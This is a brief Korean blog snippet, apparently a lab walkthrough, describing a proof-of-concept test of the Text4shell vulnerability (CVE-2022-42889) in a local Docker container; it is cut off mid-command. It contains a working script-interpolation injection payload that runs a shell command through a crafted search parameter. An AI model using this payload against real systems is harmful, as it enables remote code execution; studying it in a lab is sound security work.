text4shell1 Text4shell PoC 테스트(cve-2022-42889) 1. git clone 및 jar 파일설치를 위한 maven 설치 git clone https://github.com/karthikuj/cve-2022-42889-text4shell-docker.git mvn clean install 2. Docker build docker build --tag=text4shell . 3. Docker 실행 docker run -p 80:8080 text4shell 4. text4shell 공격 실행 http://localhost/text4shell/attack?search= ${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')} curl http://localhost/text4shell/at.. 2022. 10. 24. 이전 1 다음